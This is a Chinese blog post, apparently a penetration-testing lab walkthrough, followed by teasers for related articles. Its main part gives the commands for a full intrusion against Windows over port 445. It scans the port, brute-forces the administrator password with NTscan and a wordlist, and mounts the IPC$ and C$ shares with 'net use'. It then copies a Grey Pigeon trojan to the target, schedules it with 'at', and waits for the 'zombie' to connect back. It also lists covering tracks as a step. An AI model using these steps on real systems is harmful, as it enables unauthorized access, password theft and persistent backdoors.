目录

一、实验流程

二、实验过程

  2.1 信息收集

  2.2 利用过程

  2.3 暴力破解系统密码之445

  2.4 通过木马留后门


一、实验流程

0.授权(对方同意被渗透测试才是合法的。)
1.信息收集
  nslookup whois
2.扫描漏洞
  namp=ip范围 端口 80(IIS,apache,什么网站)scanport
  高级扫描:如IIS漏洞2003——IIS6.0       2008——IIS7.0
            扫描网站漏洞(owasp top10)
3.漏洞利用

4.提权(shell环境、桌面环境、最高权限)
========
5.毁尸灭迹
6.留后门
7.渗透测试报告

手工测试端口号开放:
telnet IP地址 测试端口

1.scanport扫描445端口

2.漏洞利用之IPC$:
进行暴力破解:NTscan

3.
net use  \\10.1.1.2\ipc$ 密码 /user:用户
=====================================
net use f: \\10.1.1.2\share 密码 /user:用户
net use f: /del
net use * /del
net use f: \\10.1.1.2\c$ 密码 /user:用户
==========================================

4.制作木马
利用光盘上的灰鸽子软件

5.植入木马(留后门)
copy d:\heihei.exe \\10.1.1.2\c$

6.设置计划任务自动执行木马:
net time \\10.1.1.2
at \\10.1.1.2 11:11 "c:\heihei.exe"

7.等待肉鸡上线

二、实验过程

​win7想打server

2.1 信息收集

比如收集445端口的。扫描软件很多,win平台以ScanPort为例。

还可以用telnet命令,不用扫描工具。

例如目前的目标机器10.1.1.1 的 445 端口开着,446 端口关闭。

用telnet分别手动探测这俩端口:

扫描技术就是为了确定攻击目标。有了445就可以就IPC$漏洞


2.2 利用过程

net use f: \\10.1.1.1\share 123.abc /user:administrator

这句话是将对方的share路径映射为本机的F盘。

在这个里面可以跟操作本地文件夹目录一摸一样。

怎么查看当前有哪几条连接记录呢?

如何删除这条记录呢》

想要攻击服务器的445端口,对于命令

net use f: \\10.1.1.1\ipc$ 123.abc /user:administrator

只缺123.abc,即可以通过暴力破解进入对方的ipc$.

(安全建议:服务器管理员别叫Administrator,不建议用户名跟公司名等有关系)

2.3 暴力破解系统密码之445

NTscan其实就是不同的利用上述命令。

可以用真空密码字典生成器制作字典

开始扫描

有了密码就可以为所欲为了、

net use \\10.1.1.1\ipc$ 123.abc /user:administrator

可以查看c盘下所有文件夹

2.4 通过木马留后门

通过灰鸽子,配置服务程序就是制作木马

运行一下藏在windows server的exe

替server做一个计算任务运行该程序:

查看server时间

可以看到目标机器已经上线。 可以干很多事。。。

简单渗透测试流程演示(445端口、IPC$、灰鸽子)的更多相关文章

  1. Web渗透测试流程

    什么是渗透测试? 渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法 ...

  2. 『安全科普』WEB安全之渗透测试流程

    熟悉渗透流程,攻击会像摆积木一样简单! 0x 01:信息收集 收集网站信息对渗透测试非常重要,收集到的信息往往会让你在渗透中获得意外惊喜. 1. 网站结构 可以使用扫描工具扫描目录,主要扫出网站管理员 ...

  3. 【转】WEB安全之渗透测试流程

    熟悉渗透流程,攻击会像摆积木一样简单! 0x 01:信息收集 收集网站信息对渗透测试非常重要,收集到的信息往往会让你在渗透中获得意外惊喜. 1. 网站结构 可以使用扫描工具扫描目录,主要扫出网站管理员 ...

  4. 渗透测试流程——渗透测试的9个步骤(转)

    目录 明确目标 分析风险,获得授权 信息收集 漏洞探测(手动&自动) 漏洞验证 信息分析 利用漏洞,获取数据 信息整理 形成报告 1.明确目标 1)确定范围:测试的范围,如:IP.域名.内外网 ...

  5. 简单web测试流程(转载)

    转载自 http://blog.csdn.net/qq_35885203 1.界面操作模式打开jmeter 进入jmeter安装目录的bin目录下,双击“jmeter.bat”文件即可打开jmeter ...

  6. 实验吧 这个看起来有点简单!&渗透测试工具sqlmap基础教程

    题目地址:http://ctf5.shiyanbar.com/8/index.php?id=1 下载sqlmap,拖到python安装文件夹下面,在桌面创建sqlmap的cmd快捷方式,都不赘述. 教 ...

  7. Kali Linux渗透测试实战 1.3 渗透测试的一般化流程

    1.3 渗透测试的一般化流程 凡事预则立,不预则废,做任何事情都要有一个预先的计划.渗透测试作为测试学科的一个分支,早已形成了完整的方法论.在正式开始本书的实践教学章节之前,我也想谈一谈使用Kali ...

  8. 《Metasploit渗透测试魔鬼训练营》第一章读书笔记

    第1章 魔鬼训练营--初识Metasploit 20135301 1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防 ...

  9. PTEST 渗透测试标准

    1:前期交互阶段 在前期交互(Pre-Engagement Interaction)阶段,渗透测试团队与客户组织进行交互讨论,最重要的是确定渗透测试的范围.目标.限制条件以及服务合同细节.该阶段通常涉 ...

随机推荐

  1. 手写Promise简易版

    话不多说,直接上代码 通过ES5的模块化封装,向外暴露一个属性 (function(window){ const PENDING = 'pending'; const RESOLVED = 'fulf ...

  2. 基于伪分布式Hadoop搭建Hive平台详细教程

    一.搭建环境的前提条件 环境:Linux系统 Hadoop-2.6.0 MySQL 5.6 apache-hive-2.3.7 这里的环境不一定需要和我一样,基本版本差不多都ok的,所需安装包和压缩包 ...

  3. Java面试题(Hibernate篇)

    Hibernate 113.为什么要使用 hibernate? 对JDBC访问数据库的代码做了封装,大大简化了数据访问层繁琐的重复性代码. Hibernate是一个基于JDBC的主流持久化框架,是一个 ...

  4. C++ strcmp与strncmp的比较

    C++ strcmp与strncmp的比较(转载)  原文链接:https://www.cnblogs.com/ybqjymy/p/12565444.html strcmp与strncmp都是用来比较 ...

  5. JDK 8 新特性之函数式编程 → Stream API

    开心一刻 今天和朋友们去K歌,看着这群年轻人一个个唱的贼嗨,不禁感慨道:年轻真好啊! 想到自己年轻的时候,那也是拿着麦克风不放的人 现在的我没那激情了,只喜欢坐在角落里,默默的听着他们唱,就连旁边的妹 ...

  6. e3mall商城的归纳总结8之solr集群、activemq的搭建和使用

    由于本节内容比较分散,因此专门为这两个技术进行开展了帖子. solr集群的搭建 solr集群solrJ的测试 activemq的搭建 activemq的使用 引入activemq.jar包 我们先来说 ...

  7. sha1sum校验方法

    sha1sum校验方法,我们可以保存到一个文件中.还可以根据已经得到的hash来确认文件.MD5类似. [root@ffcs211 test_dir]# sha1sum New.EXE 3fe44e8 ...

  8. 利用OpenCV进行H264视频编码的简易方式

    在Python下,利用pip安装预编译的opencv库,并实现h264格式的视频编码. 1. 安装OpenCV $ pip install opencv-python 建议在python虚拟环境下安装 ...

  9. 常用注解@Intdef与@Stringdef

    1.优点 可以代替枚举,静态常量,可以让注解只在代码中存在,编译后就删除,可以省内存. 2.@IntDef 2.1 官网 https://developer.android.com/reference ...

  10. Mac 的命令行配置字体颜色

    1.在mac命令行终端输入: ls -al  查看所有隐藏文件,找到.bash_profile vi .bash_profile  编辑文件,贴入以下内容并保存 source .bash_profil ...